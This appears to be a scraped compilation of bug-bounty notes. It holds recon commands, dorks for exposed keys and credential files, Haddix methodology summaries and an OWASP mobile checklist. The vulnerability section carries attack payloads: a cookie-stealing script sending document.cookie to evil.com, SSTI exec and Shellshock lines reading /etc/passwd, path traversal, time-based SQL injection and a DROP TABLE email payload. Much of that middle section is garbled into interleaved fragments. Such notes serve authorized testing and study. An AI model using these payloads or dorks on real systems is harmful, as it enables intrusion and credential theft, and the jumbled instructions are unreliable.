Recon workflow

Horizontal & vertical Correlations

https://mxtoolbox.com/asn.aspx
https://viewdns.info/reversewhois
https://domaineye.com/
amass intel -org <company name here>
amass intel -asn <ASN Number Here>
amass intel -cidr <CIDR Range Here>
amass intel -whois -d <Domain Name Here>
amass enum -passive -d <Domain Name Here>
https://github.com/danielmiessler/SecLists
Subdomain bruteforcing - https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
https://github.com/internetwache/CT_subdomains
https://crt.sh/?q=%25.facebook.com
https://github.com/ghostlulzhacks/CertificateTransparencyLogs
gobuster dns -d starbucks.com -w subdomains.txt
https://github.com/infosec-au/altdns
A small list of these
resources can be found below:
● Virus Total
● Netcraft
● DNSdumpster
● Threat crowed
● Shodan
● Cencys
● DNSdb
● Pastebin
knockpy.py <Domain Name Here>
https://github.com/blechschmidt/massdns

finding aws endpoints, awskeys, urls, upload fields

https://github.com/incogbyte/jsearch

Google dorks
site:<Third Party Vendor> <Company Name>
site:pastebin.com “Company Name”
site:*.atlassian.net “Company Name”
site:bitbucket.org “Company Name”
Inurl:gitlab “Company Name”
https://pentest-tools.com/information-gathering/google-hacking#

Shodan dorks
net:<”CIDR,CIDR,CIDR”>
org:<”Organization Name”>
ssl:<”ORGANIZATION NAME”>

Censys - https://censys.io/ipv4

waf - https://github.com/EnableSecurity/wafw00f
Wafw00f <URL HERE>

wafbypass - https://github.com/0xInfection/Awesome-WAF#known-bypasses

subdomaintakeover - https://github.com/haccer/subjack
https://github.com/EdOverflow/can-i-take-over-xyz

github dorks - https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt

Aws s3
s3bucket dorks - site:.s3.amazonaws.com "Starbucks"
https://github.com/ghostlulzhacks/s3brute
python amazon-s3-enum.py -w BucketNames.txt -d <Domain Here>

Google cloud storage

https://github.com/RhinoSecurityLabs/GCPBucketBrute
python3 gcpbucketbrute.py -k <Domain Here> -u

Digital ocean spaces

site:digitaloceanspaces.com <Domain Here>
https://github.com/appsecco/spaces-finder

Unauthenticated Elasticsearch DB
port "9200" elastic [;shodan query]

Exposed Docker api

product:docker [;shodan query]

Kubernetes API
unauthenticated REST API on port 10250
product:"kubernetes"

Gitdumper (.git) - https://github.com/internetwache/GitTools/tree/master/Dumper

Subversion (.svn)- https://github.com/anantshri/svn-extractor

Exploitation CMS
Wordpress - https://github.com/wpscanteam/wpscan
Joomla - https://github.com/rezasp/joomscan
Drupal - https://github.com/droope/droopescan
adobe aem - https://github.com/0ang3el/aem-hacker
Magento - https://github.com/steverobbins/magescan

URLSCAN
https://urlscan.io/
https://rapiddns.io
https://sitereview.bluecoat.com/#/

Security Tools
https://tools.tldr.run/

Awesome Shodan Queries for Recon

https://github.com/jakejarvis/awesome-shodan-queries
https://www.osintme.com/index.php/2021/01/16/ultimate-osint-with-shodan-100-great-shodan-queries/

Simple Recon Workflow

Subdomain
httprobe scan
- cat - amass enum -brute
amass-output.txt -active
| httprobe -d domain.com-o
-phttp:81 amass-output.txt
-p http:3000 -p https:3000 -p http:3001 -phttps:3001 -p
http:8000 -phttp:8080 -p https:8443 -c 50 | tee online-domains.txt
anew - cat new-output.txt| anew old-output.txt |httprobe
dnsgen - catamass-output.txt | dnsgen - | httprobe
Aquatone- catdomains-endpoints.txt | aquatone
files/directory bruteforcing - ffuf -ac -v -u https://domain/FUZZ -wwordlist.txt
 TBHMv4 notes

S.NO Techniques
Acquisitions
2 ASN enumeration
3 Reverse whois
4 Ad/Analytics/technology identifiying
5 Shodan
Google-FU- Captures response data, cert data, stack
6 profiling data & more

Finding Subdomains
1 Linked & Js discovery

other tools used

2 Subdomain & Scraping

if your just looking for subdomains
Finding Infrastructure sources
Search sources
Certificate sources
Security Sources
Scraping with google
Scraping with Amass
Scraping with Subfinder v2
Scraping with Github-subdomains.py
Scraping with Shosubgo
Scraping with Cloud Ranges

3 Subdomain bruteforcing
Sudomain Bruteforce with Amass
Sudomain Bruteforce with shuffleDNS

Alteration scanning

4 Portanalysis & Service Analysis

Portanalysis - Massscan
Portanalysis - Dnmasscan
Service scanning - Brutespray

5 Github dorking
6 Screenshotting

7 Sudomain takeover
Sudomain takeover tools used

8 Automation tools & framework used

C-tier - Frameworks - found in github repos

B-tier frameworks - found in github repos
A-tier frameworks - Found in github repos
S-tier frameworks - Found in github repos
Mindmaps
The Bug Hunter's Methodology v4.0 - Recon Edition by @jhaddix
#NahamCon2020!

Tools Used/Website used

crunchbase
2) Metabigor
3)
1) Amass intel -asn asnnumber
whoxy.com
2) Domlink
builtwith.com
terms of service text
privacy policy text
Use Shodan membership api to fetch more info

Burpsuite
report Pro file
as html
Gospider & hakrawler

in js files

use subscraper
Censys, Robtex, waybackmachine, dnsdumpster, PTRarchive.com
netcraft, DNSDB search, Passivetotal etc
yahoo, google, baidu, bing,ask, dogpile etc
crt.sh, certspotter,
hackertarget, certdb
security etcvirustotal, fsecure riddler,
trails,
threatcrowd,
site:twithc.tv threatminer
-www.twitch.tvetc -watch.twitch.tv
site:twithc.tv -www.twitch.tv -watch.twitch.tv -dev.twitch.tv
amass -d twitch.tv
subfindergithub-subdomains.py
python3 -d hackerone.com -v -t "githubpersonalaccounttoken" -d
twitch.tv > twitch.tv
go run main.go -d twitch.tv -s "githubtoken"
technique to monitor AWS, GCP, Azure for SSL

amass enum -brute -d twitch.tv -src

amass enum -brute -d twitch.tv -rf resolvers.txt -w bruteforce.list
shuffledns -d hackerone.com -w words.txt -r resolvers-excellent.txt
Subdomain Bruting lists -> tomnomnom - githubrepo -> all.txt
Asset note -> commonspeak2
dev-1.company.com

massscan -p1-65535 ip --max-rate 1800 -oG outputfile.txt

dnmasscan
scan outputfile.txt
the remote dns.logprotocls
administration -p80,443for-oG masscan.log
default passwords
which takes nmap OG file format
Massscan -> nmapservice scan -oG -> brutespray credential
bruteforce
fullmode on github and sensitive data exposure by
@th3g3ntelmans video in bugcrowd
eyewitness, aquatone, httpscreenshot

can i takeover xyz - github repo

SubOver & nuclei
recon framework
tomnomnom tools in github repo
https://gist.github.com/dwisiswant05f647e3d406b5e984e6d69d35
38968cd
7) devanshbatham/Gorecon
8)
2) LordNeoStark/tugarecon
SilverPoision/Rock-ON
3) epi052/recon-pipeline
files of all public programs in hackerone & bugcrowd
watch for new domains
XMind - Mind Mapping Software
Notes from The Bug Hunter's Methodology - Application Analysis - Jason Haddix - Ha - Hackerone - #NahamCon2022

Beginning your journey

Suggested books:
- The Web Application Hackers handbook 2 - Dafydd Stuttard
- Real world bughunting - Peter Yaworski
- Owasp testing guide 4.2 - Owasp.org
- Bugbounty Bootcamp - Vickie Li
- The Hacker Playbook 3 - Peter Kim
- Breaking Into Information security - Andy Gill
- Hands on hacking - Matthew Hickey, Jennifer Arcuri
- Bugbounty Playbook and Bugbounty Playbook 2 - Alex thomas aka Ghostlulz
- Hacking APIs - Corey J. Ball

Platforms to Practice
- PentesterLab
- Web Security Academy - Portswigger
- Hackthebox
- Vulnhub
- OVWAD - OWASP Vulnerable Web Applications Directory

Think of testing the application after Authentication, we have more functionalities to test
- My profile section
- Integration functions
- Paid Account Functions
- Published / Used Authenticated API Calls
- Upload / Export Functions
- Undocumented API calls and Admin tools
- Multiple user levels
- Customer data
- Persistent user input

1) Testing Layers
- Open Ports and Services - Default creds on services, Service level exploits
- Web hosting Software - Default creds, web server misconfigurations, web exploits
- Application framework
- Application: custom code or COTS
- Application Libraries [Usually Javascript]
- Integrations

2) Tech profiling
- Whatruns [Browser extension]
- Wappalyzer [Browser extension]
- Webanalyze - https://github.com/rverton/webanalyze

3) Finding CVE's and Misconfigs

Nuclei scanner & Nuclei templates
To find known vulnerabilities, framework loginpages, default creds etc
Others tools
- Gofingerprint by tanner barnes
- Sn1per by @xer0dayz
- Intrigue Core by Jcran
- Vulners (burp extension)
- Jaeles scanner by j3ssi3jjj
- retire.js

Bugbounty tips: Use Tweetdeck to stay updated with latest trends of Cve's, writeups, vuln classes etc
-4)Naabu
Port scanning
- Rustscan

5) Content Discovery tools

- Burp Turbo intruder
- Feroxbuster
- Gobuster
- Ffuf
- dirsearch
- Wfuzz - the web fuzzer

6) Content Discovery tips

- Config files for DB connections
- Where the admin login and routes/endpoints are
- Example Appsettings.json in a Asp.net app
-OSS - Tool used Source2URL - scans source code directory and harvets urls from it
- Scavenger - Burp extension

Content Discovery [Historical]

- Echo bugcrowd.com | gau | wordlistgen | sort -u
- waymore - github.com/xnl-h4ck3r/waymore
- archive.org/web
- Extract Endpoints from mobile apks - github.com/dwisiswant0/apkleaks
- detecting the changes in target - github.com/dgtlmoon/changedetection.io
7) Application Analysis

Big6 questions
- How does the app pass data ?
- How/where does the app talk about users ?
- Does the site have multi tenancy or user levels ?
- Does the site have a unique threat model ?
- Has there been past security research & vulns - hackerone & bugcrowd ?
- How does the app handle ?

Spidering
- burp & zap
Spidering on command line
- Hakrawler
- Nuclei
- Katana - next gen crawling and spidering framework

Javascript discovery
- xnLinkFinder
- GAP [Burp extension]
- beautifier.io
- retire.js

Parameter Analysis
- Xssed.com
- GF patterns
- Burpbounty pro

Hot Areas
Personal tracking/ note taking
- Notion
kerone - #NahamCon2022
Popular Google Dork Google Dork Techn
operators Details
this dork will show you the cached version of any
cache: website
searches for specific text contained on any web
allintext: page
exactly the same as allintext, but will show pages
allintitle: that contain titles with X characters
allinurl: it can be used to fetch results whose URL contains
all thetospecified
used searchthe characters,
for any kind of file extensions,
filetype: this is exactly same as allinurl, but it is onlyfor
inurl: example,
useful ifone
yousingle
want keyword
to search for jpg files you can
used tofor search for various keywords inside the title,
intitle: for example,
rity tools will search for titles beginning with “security” but
inanchor: “tools”
this can bewhen
is useful somewhere
you need else
to in the page
search for an exact
intext anchortotext
useful usedpages
locate on any links,
that contain certain
link: characters or strings inside
will show the list of web pages their text,
that have links to the
site: specified URL,
will show you the full list of all indexed URLs for the
* specifiedused
wildcard domain and subdomain,
to search pages that contain
| “anything”
this before
is a logical your word,
operator, e.g. e.g. how to"tips" will
"security"
Plus+ show all the sites which contain
used to concatenate words, useful to detect “security” or pages
“tips,”
Minus - that
minus useoperator
more thanisone usedspecific key,
to avoiding showing
Log files This will show a lot of results that include username
inside
Vulnerable web servers The all *.logGoogle
following files Dork can be used to detect
Open FTP servers vulnerable or hacked
With the following dork, servers
you’ll that allow
be able to appending
explore
ENV files public FTP servers, which can often
.env files are the ones used by popular web reveal
SSH private keys development
SSH frameworks
private keys are usedtotodeclare
decryptgeneral
information
Putty Logs that
In is case,
this exchanged
we can in use
the SSH protocol.
a simple dork to fetch SSH
Email lists usernames from PUTTY logs:
we are going to fetch excel files which may contain a
lot
Weoffiltered
email toaddresses.
check out only the .edu domain names
Live cameras and
The found
followinga popular
Google university with aroundcan
hacking techniques 1800
help
you fetch live camera web pages that are
Here’s the dork to fetch various IP based cameras: not
To find WebcamXP-based transmissions:
MP3, Movie, and PDF And another one for general live cameras:
files if you’re one of those classic individuals who still
download
The same legal music,
applies youfree
to legal can media
use this dork
files or to
PDFfind
Weather documents
we ran a dorkyouthat
may need:
lets you fetch Weather Wing
device transmissions. If you’re involved in
 Google Dork Technique
Example Github
cache: securitytrails.com filename:.npmrc _auth
allintext: hacking tools filename:.dockercfg auth
allintitle:"Security Companies" extension:pem private
allinurl client area extension:ppk private
filetype: jpg filename:id_rsa or filename:id_dsa
inurl: admin extension:sql mysql dump
intitle:secu extension:sql mysql dump password
filename:credentials aws_access_key_id
inanchor:"cyber security" filename:.s3cfg
intext:"safe internet" filename:wp-config.php
link: microsoft.com filename:.htpasswd
filename:.env DB_USERNAME NOT
site:securitytrails.com homestead
* a website, filename:.env MAIL_HOST=smtp.gmail.com
"security" "tips" filename:.git-credentials
security + trails
security -trails
allintext:username filetype:log
inurl:/proc/self/cwd
intitle:"index of" inurl:ftp
site:xyz.com/.env
intitle:index.of id_rsa -id_rsa.pub
filetype:log username putty
filetype:xls inurl:"email.xls"
site:.edu filetype:xls inurl:"email.xls"

inurl:top.htm inurl:currenttime
intitle:"webcamXP 5"
inurl:"lvappl.htm"
intitle: index of mp3
intitle: index of pdf intext: .mp4
intitle:"Weather Wing WS-2"
S.No Vulnerability Name
1 Privilege escalation

2 Privacy settings bugs

3 Session bugs
4 Insecure CORS misconfiguration
5 CSRF
6 XSS
7 Host header injection
8 URL redirection or open redirect
9 parameter tampering
10 HTML injection
11 File inclusion
12 Missing spf, dmarc records
13 SSRF
Critical file found & Source code
14
disclosure
15 subdomain takeover
16 command injection
17 fileupload vulnerability
18 XXE Injection
19 account lockout
20 blind xss
21 Buffer overflow - web
22 CMS vulnerability hunting
23 IDOR
24 Long password dos attack
No Broken Access
rate limiting control (Missing
vulnerability - logical
25
function level access
flow control, IDOR,
26 Password
privilegereset poisiong
escalation,
27 authorizationbypass, business logic
flaws, forceful browsing, parameter
Account takeover
manipulation, pathvia forget password
traversal, local file
28
page
include)
29 Broken Access Control
30 Rate Limiting bypass
31 Lack of Password confirmation
32 2FA OR OTP Bypass
Blind SQL Injection
33
Remote Code Execution Vulnerability
34
Stealing Oauth Token
35
36 External Service Intraction
Server side Include Injection
37
38 Client and server Side Template injection
39 Exif GeoLocation Data Not Stripped
40 CRLF injection
 Ecommerce bugs to test on
Order management flaws
32 Coupon and reward management flaws
33 Payment gateway integration flaws
34 Content management system flaws
35
 Approach
Horizontal (admin-admin & user to user)/Vertical Privilege
escalaiton (User-admin)

-password reset/change
if it is access-allow-origin:*
-expires on user removal - not exploitable
origin: evil.com
1) remove anticsrf tokens & parameter
origin:
2) pass blank site.evil.com
paramter
<iframe src="http://evil.com" height="100" width="100"></iframe>
6) Cookie stealing through
X-forwarded-host: xss
realweb.com
document.location.href="http://evil.com/p/?page="+document.cookie
X-forwarded-host:
open, u, file, val, validate, bing.comdomain, callback, return, page, feed,
2) webcache
host, port, next, poisoning through HHI
data, reference, site,
html
ecommerce websites
2) input value reflecting back
3)
file,<h1>adam</h1>
document, folder, root, path, pg, style, pdf, template,
php_path,
detecting -doc mxtoolbox.com
burp collabator also used
4) any.com/index/php?uri=http://external.com
https://github.com/danielmiessler/SecLists/tree/master/Discovery
/Web-Content
service provider. payloads
signingup
3) type
1) how of on
findservice
to stored cmdi: provider
xss -using
attacker like
delimiterinput github,
list
saved heroku,
(likein;^&,
servershopify,
&&, |, ||, %0D,
- saved in
2)
%0A, github.com/fuzzdb-projects/fuzzdb/tree/master/attack/file-
\n, <)
database
upload/malicious-images
3)
2) useit wont online tool called pingb.in - check for external ping
be reflected
3)
4) pixel
for blindflood xxe attack
-xss
useinpython
3)
IDOR
3) look
sent for
the blind
request pages -m
to sequencer likeSimpleHTTPServer
( contact us, log viewers, 80
5)
1) SYSTEM
intercept
feedbackpage, "file:///etc/passwd"
loginpage
chatapp, - pass for
long local
string file
of read
passwords or any
Browsing
scenario
4) or sent -with
to account
1 intruder - 1
make 1000 times request
quanitiy
ticket of input things
generation app, any app use
https://acme.com/changepw/id?=1234
1) mostly found on user settings or moderation
profile managementor updation,
the
Missing
saving page will
function load
forms)- hashing slow
level access control
2)
1) two
passwordaccounts required - process - resource consumption
-you wordpress,
types
forceful
4) online
can ofcreate
browsing
tool
joomla,
overflows
used
a 2nd
drupal,
-xsshunter.com
buffer,
-overflow
account
vbulletin,
stack,
and heap,
you
magento
get integer, formatby cpu
strin
3)
2) intercept
same like the
buffer
2) request
find - change
vulnerable - but emailid
trying
component ofassinged
only attacker
inin password
the cms field
follows
GET
5) /admin/viewTransactions
4) copy
whichlogout the payload
https://acme.com/changepw/id?=5678
doesnt have overflow& paste it in input field
3) Search
2)
GET
6)
1) dos
capture using buffer
/ADMIN/viewTransactions
reflection will
forgot be found
password on -xsshunter.com
pageapplication
or even dosexploit
any attack
request
in google
into
5) try login
password length with victim account - it wont work
7)
if multiple
you
burpsuite
scenario
3) try to completely
- 2 blind
- user
signup a account xss using
logout
moderation & intruder
loginto account #1 and issue the
static
1)
2)
1) forget
request
sent
find files
to
user password
intruder
id page -> intercept in burpsuite
4) give
1)Check
GET details
input intercept
filed
/patientIMAGES/3216647.jpg and the inset request
payload like id=1
2)
with host header
thepassword
uid from attack
account #2. you may id
3)
2)
5)
GET
make
replace
give 1000 times
attacker
/patientDocuments/21714.pdf
idrequest
more instead
then theof victim
length -be able tothe
forward change
request the
3)
4) victim
accounts
it will
3) applicatian will
affect
do functionality receive
password. both emailid
having
user & tofrom
serverfind the
users evilwebsite
guids lowerwhich
the priority
6)
2) Inset dos
in user-agent
mentioned
1) Intercept
a but, but look inthehostheader
forget
for otherpassword
endpoints pagethat might alow you to search
Direction
for a user's guid function calling 2) add
3)Confirm
POST change the
/admin/viewTransactions.ashx?
X-Forwarded-Host: time interval
bing.com
Hash based IDOR
1)Create an account. 2) Change email id from A to B . 3) Now
admin=true&from=08032017&to=08032018
1)Go
-1)usedid to target
sometime website hased xyz.com
with base64 3) forward the
Generate
NoteIntercept
Payload: forget
the password
forget for email
password page A. 4)2) Also
Sendtryto same
intruderconcept
3) add
2) Create
request
on an account
Local and
file Verify
inclusion,
password also. bing.com 4) Target to email 3) forward the email
Path address
Traversal
X-Forwarded-Host:
Parameter
3)Go Manipulation & logic bugs
to xyz.com/setting/profile
request
id=5+and+1=2
Required
giving
4)In to
negative
company delete
logopriceaccount,
upload maliciouschange emailid, file/image e.g:RCE.php
GET /view?pg=
1)Capture
4)Bruteforce termsandservices
the6 request
digit using burp intruder
through suite because no rate limit
%00.gif
1)Login and
using click on
3rd party save. app like facebook,gmail....
and other
',0)waitfor
logic
5)Now captcha
left delay'0:0:05'--
flow - ecommerce
click verification
on logo and view image or not implemented in get sms
GET
2)Send /view?pg=../../../../../etc/passwd%00
to repeater
skipping
6) A new steps
2)Intercept
0)Capture url will
The
request on workflows
open
request
usingand at the
using
burpsuite end of url add ?cmd=id as you
burpsuite
1)if(now()=sysdate(),sleep(5),0))
"1)Used
can see id
1)Intercept toDisplay
additem->checkout->enter
command
the Dynamic
request sucessfully
using Content
burp -- suite
executeon web page
shippinginfo->payment
3)In host header replace realweb with burp collaborater payload
Hint:
Scanerio-2
2)Spider
3)Change input the reflect
target back
host
redirect_url=bugbountypoc.com then try to insert payload
1)Insert
OR add arbitry
new data
header
2)(select(0)from(select(sleep(3)))v)/*'+in input filed like=aaaaaaaaaaaaa
x-forwarded-for:burpcollaborater payload
2)Web
1)Crawal Template
your enginewhich
target
3)Search .shtml extension page using burp used suite this
check for /cgi-bin/status
(select(3)from(select(sleep(3)))v)+'"+
FreeMarker
2)Send
4)after tofail
finding - Java-based
repeater these page template
input engine
filed add payload
4)In
2) If case
input
4)Forward
1)Download the change
reflect
Image in Form
request referer
response header
header parameter
its means
https://github.com/ianare/exif-samples tothat is
(select(0)from(select(sleep(3)))v)+"*/
Velocity
3)Replace
<!--#echo - Java-based
user-agent:
var="DATE_LOCAL" template
{:;};echo engine
$(</etc/passwd)
-->
bugbountypoc.com
vulnerable
2) Gotoon Carriage Return: %0A Picture >save Into PC
Smarty
4)Click
5) Forward -jpg
PHP >
send Gotp
request andGPS
Template >Download
engine
in response
and check inyou will see root user info of web
response
5)Check
3) Upload burp collaborater response
website are able to perform dns
Twig
server - PHPImage Template on target
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
engine
Linefeed
lookup
4)Copy
4) ' and : %0Durl and paste into Tool
image
extractvalue(1,concat(0x0a,@@version)) or'
Jade - Node.js Template engine
(http://metapicz.com/)
Jinja2 - Python/Flask Template engine"
3)Add Payload like %0a%0dxxxxxxxxxxxxx

4)After insert this payload if reflect response header with new

line then add new cooke header
1) Price manipulation during order placement
2) Shipping address manipulation after order placement
3) Absence of mobile verification for cash-on-delivery orders
4) Getting cash back/refunds even when the order is canceled
5) Non-deduction of discounts, even after order cancellation
6)
1) Using
Coupon automation
redemption, techniques
even aftertoorder
perform illegitimate ticket blocking for a
cancellation
certain period of time
2) Bypass of a coupon’s terms and conditions
7)
3) Client-side
1) Flaws avalidation
Bypassinoftransaction
coupon’sfile bypass for maximum seat limit on a single order
management
validity
8)
2)
4) Bookings/reservations
Unusual
Use activities
ofmodification
multiple coupons using
involving fake information
forrole-based
the with
same access control (RBAC), which regulates
transaction
1)
9) Price
Usage
access of burner
to computer at client-side
(disposable)
or codes phones
network resources zero or negative values
for verification
5)
2) Predictable
Price coupon
modification at client-side with varying price values
3)
6) Flaws
Failure within the customer notification
of a recomputation system
in coupon value after partial order cancellation
3)
4) Manipulating
Misuse the
of rich-text contact URL
editor functionalities (which edit text within web browsers)
7)
4) Illegitimate usethird-party
of coupons with other products
5) Bypassing the
Flaws in third-party checksum
application program interfaces (APIs), which are used to
5) Changing
create the price
specialized webbefore
storesthe transaction is completed
6) Flaws in integration with point-of-sale (POS) devices
 Tool Used
burpsuite

burpsuite

burpsuite
Corsy/burpsuite
jsfiddle.net/burpsuite
xss validator/burpsuite
burpsuite
burpsuite
burpsuite
burpsuite
lfisuite tool from github
anonymousmail.me
https://emkei.cz/
burpcollabator/https://www.expressvpn.com/
what-is-my-ip
burpsuite
github.com/nahamsec/HostileSubBruteforcer
github.com/commixproject/commix.git
github.com/almandin/fuxploider
2) xml input fields
3) xml based apis
burpsuite
burpsuite/Xsshunter.com
burpsuite
wpscan, cmsmap, cmsscan, joomscan, drupwn,
vbulletin scanner, mage scanner, owaspVBScan
Common parameters
Burpsuite
id, user, account, number,
Burpsuiteorder, no, doc, key,
email,
Burpsuite
group, profile, edit
numeric values Burpsuite functions
lookon
Burpextension
changeused:
email,authmatrix, authz, autorize
change password,
& autorepeater
upgrade/downgrade user role,
BurpSuite
create/remove/update/delete context specific
BurpSuite
app data
shipping, invoices Burp Suite
and document viewing
Burp Suite
Burpsuite
Burpsuite OR Cookie manager
cking Burpsuite OR Manually
p://www.target.com/page?name=John'
Burpsuite
ttp://www.target.com/page?name={{7*7}}'
Burpsuite
utomation tool for SSTI exploitation:
b.com/epinna/tplmap Burpsuite
yload:
exif.regex.info/exif.cgi
{{7*7}}
Burpsuite
swd"" %}
G: {{_self.env.registerUndefinedFilterCallback(""exec"")}}{{_self.env.getFilter(""id"")}}"
Payload
{"email":"[email protected]"}
{"email":"[email protected]"}
{"email":\"asd a\"@a.com"}
{"email":"asd(a)@a.com"}
{"email":"\"asd(a)\"@a.com"}
Email Verification Bypass L
{"email":"asd'[email protected]"}
{"email":"asd'or'1'='[email protected]"}
{"email":"a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='[email protected]"}
{"email":"\"a'-IF(LENGTH(database())=9,SLEEP(7),0)or'1'='1\"@a.com"}
{"email":"\"a'-IF(LENGTH(database())=10,SLEEP(7),0)or'1'='1\"@a.com"}
{"email":"\"a'-IF(LENGTH(database())=11,SLEEP(7),0)or'1'='1\"@a.com"}
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
Lead To Cross Sit
“<script src=//xsshere?”@email.com
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
Template Inje
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SSRF Injec
[email protected] (thanks @d0nutptr)
john.doe@[127.0.0.1]
Parameter Po
victim&[email protected]
Email Header i
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com
Wildcard ab
%@example.com
HTML injection
inti.de.ceukelaire+(<b>bold<u>underline<s>strike<br/>newline<strong>strong<sup>sup<sub>sub)@gmail.com
Bypassing strict e-mail validators thro
<script>alert(0)</script>[email protected]
Two Different Account Regis
[email protected]
[email protected]
 Result Injection Status
{"code":2002,"status":200" message":"email vlaid."} Vlaid
{"code":2002,"status":200" message":bad formate."} Not valid
{"code":2002,"status":200" message":bad formate."} Not valid
{"code":2002,"status":200" message":bad formate."} Not valid
{"code":2002,"status":200" message":"email vlaid."} Valid
n Bypass Lead To SQL Injection
{"code":0,"status":500,"message":"Unspecified error"} Not valid
{"code":2002,"status":200,"message":"Email is valid"} Valid
{"code":2002,"status":200,"message":"Bad formate"} Not valid
{"code":2002,"status":200,"message":"Email Sucess"} Valid
{"code":2002,"status":200,"message":"Email Sucess"} Valid
{"code":2002,"status":200,"message":"Email Sucess"} Valid
? ?
o Cross Site Scripting

mplate Injection

SSRF Injection

rameter Pollution

il Header injection

Wildcard abuse

L injection in gmail

dators through SSO chains & integrations

count Register Using Same Email

Description

Delay :7,854 milisecond

Delay :8,696 milisecond
No Delay

Google:No Github:Yes Twitter No

1st account (Real Account)

2nd account(Fake Account)
MobileApp_PT Checklist
Penetration testing checklist based on OWASP Top 10 Mobile 2016

M1. Improper Platform Usage

M1-01
M1-02
M1-03
M1-04
M1-05
M1-06
M1-07
M1-08
M1-09
M1-10
M1-11
M1-12
M1-13
M1-14

M2. Insecure Data Storage

M2-01
M2-02
M2-03
M2-04
M2-05
M2-06
M2-07
M2-08

M3. Insecure Communication

M3-01
M3-02
M3-03
M3-04
M3-05

M4. Insecure Authentication

M4-01
M4-02
M4-03
M4-04
M4-05
M4-06
M4-07

M5. Insufficient Cryptography

M5-01
M5-02
M5-03
M5-04

M6. Insecure Authorization

M6-01
M6-02
M6-03
M6-04

M7 Client Code Quality

M7-01
M7-02
M7-03
M7-04
M7-05
M7-06
M7-07
M7-08

M8. Code Tampering

M8-01
M8-02
M8-03

M9. Reverse Engineering

M9-01
M9-02

M10. Extraneous Functionality

M10-01
M10-02
M10-03
WASP Top 10 Mobile 2016

Test Name Result

Misuse of App permissions Issue
Insecure version of OS Installation Allowed Issue
Abusing Android Components through IPC intents ("exported" and "intent-filter") Issue
Misuse of Keychain , Touch ID and other security related controls Issue
Minimum Device Security Requirements absent Issue
Excessive port opened at Firewall Issue
Default credentials on Application Server Issue
Weak password policy Implementation Issue
Exposure of Webservices through WSDL document Issue
Security Misconfiguration on Server API Issue
Security Patching on Server API Issue
Input validation on API Issue
Information Exposure through API response message Issue
Control of interaction frequency on API (Replay Attack) Issue

Test Name Result

Unrestricted Backup file Issue
Unencrypted Database files Issue
Insecure Shared Storage Issue
Insecure Application Data Storage Issue
Information Disclosure through Logcat/Apple System Log (ASL) Issue
Application Backgrounding (Screenshot) Issue
Copy/Paste Buffer Caching Issue
Keyboard Press Caching Issue

Test Name Result

Insecure Transport Layer Protocols Issue
Use of Insecure and Deprecated algorithms Issue
Use of Disabling certificate validation Issue
SSL pinning Implementation Issue
End-to-end encryption Issue

Test Name Result

Remember Credentials Functionality (Persistent authentication) Issue
Client Side Based Authentication Flaws Issue
Session invalidation on Backend Issue
Session Timeout Protection Issue
Cookie Rotation Issue
Multiple concurrent logins Issue
Exposing Device Specific Identifiers in Attacker Visible Elements Issue

Test Name Result

Cryptographic Based Storage Strength Issue
Poor key management process Issue
Use of custom encryption protocols Issue
Token/Session Creation and handling Issue

Test Name Result

Client Side Authorization Breaches Issue
Insecure Direct Object references Issue
Missing function level access control Issue
Bypassing business logic flaws Issue

Test Name Result

Content Providers: SQL Injection and Local File Inclusion Issue
Broadcast Receiver Issue
Service component Issue
Insufficient WebView hardening Issue
Injection (SQLite Injection, XML Injection) Issue
Local File Inclusion through NSFileManager or Webviews
Abusing URL schemes or Deeplinks
Sensitive Information Masking Issue

Test Name Result

Unauthorized Code Modification Issue
Runtime Manipulation Issue
Rooted or Jail-broken device checking Issue

Test Name Result

Reverse Engineering the Application Code (Code Obfuscating Checking) Issue
Information leakage/Hardcoded credential in the binaries Issue

Test Name Result

Debuggable Application Issue
Passwords/ Connection String disclosure Issue
Hidden and Unscrutinised functionalities Issue
MobileApp_PT
Checklist
Penetration testing checklist based on OWASP To

Test Name
Reverse Engineering the Application Code
(Code Obfuscating Checking)
Information leakage/Hardcoded credential in
the binaries
Unauthorized Code Modification
Misuse of App permissions
Insecure version of
Abusing Android OS Installation
Components Allowed
through IPC
intents ("exported" and "intent-filter")
Unrestricted Backup file
Cryptographic Based Storage Strength
Poor key management process
Use of custom encryption protocols
Static analysis Debuggable Application

Test
MisuseName
of Keychain , Touch ID and other
security
Minimumrelated
Devicecontrols
Security Requirements
absent
Unencrypted Database files
Insecure Shared Storage
Insecure
InformationApplication
DisclosureData Storage
through Logcat/Apple
System Log (ASL)
Application Backgrounding (Screenshot)
Copy/Paste Buffer Caching
Keyboard Press Caching
UnrestrictedCredentials
Remember Backup fileFunctionality
(Persistent authentication)
Client Side Based Authentication Flaws
Client
ContentSide Authorization
Providers: Breaches
SQL Injection and Local
File Inclusion
Broadcast Receiver
Service component
Insufficient WebView hardening
Injection (SQLite Injection, XML Injection)
Local File Inclusion through Webviews
Abusing URL schemes or Deeplinks
Sensitive Information Masking
Runtime Manipulation
